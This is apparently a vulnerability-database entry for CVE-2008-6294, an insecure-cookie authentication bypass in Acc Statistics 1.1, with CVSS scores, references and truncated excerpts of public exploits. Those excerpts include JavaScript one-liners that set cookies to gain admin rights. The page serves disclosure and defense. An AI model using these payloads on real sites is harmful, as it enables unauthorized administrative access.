Published: 26/02/2009 Updated: 29/09/2017

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

VMScore: 765

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

admin/Index.php in Acc Statistics 1.1 allows remote malicious users to bypass authentication and gain administrative access by setting the username_cookie cookie to "admin."

Vulnerable Product	Search on Vulmon	Subscribe to Product
accscripts acc statistics 1.1

-==========================================- Autore: x0r - Road Crew - Evolution Team Cms: Acc Autos v40 Bug: Insecure Cookie Handling Site: pro7altervistaorg/v2/ -==========================================- Exploit: [+]javascript:documentcookie="username_cookie=admin"; [+]javascript:documentcookie="right_cookie=1"; [+]javascript:docu ...

########################################################################### ______ __ __ ______ __ ______ / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ / /___/ /_/ / / ...

########################################################################### ______ __ __ ______ __ ______ / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / /_____/\__, / /_/ \ ...

CWE-264 http://www.securityfocus.com/bid/32078 http://secunia.com/advisories/32517 https://exchange.xforce.ibmcloud.com/vulnerabilities/46292 https://www.exploit-db.com/exploits/6965 https://nvd.nist.gov https://www.exploit-db.com/exploits/6968/

CVE-2008-6294

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect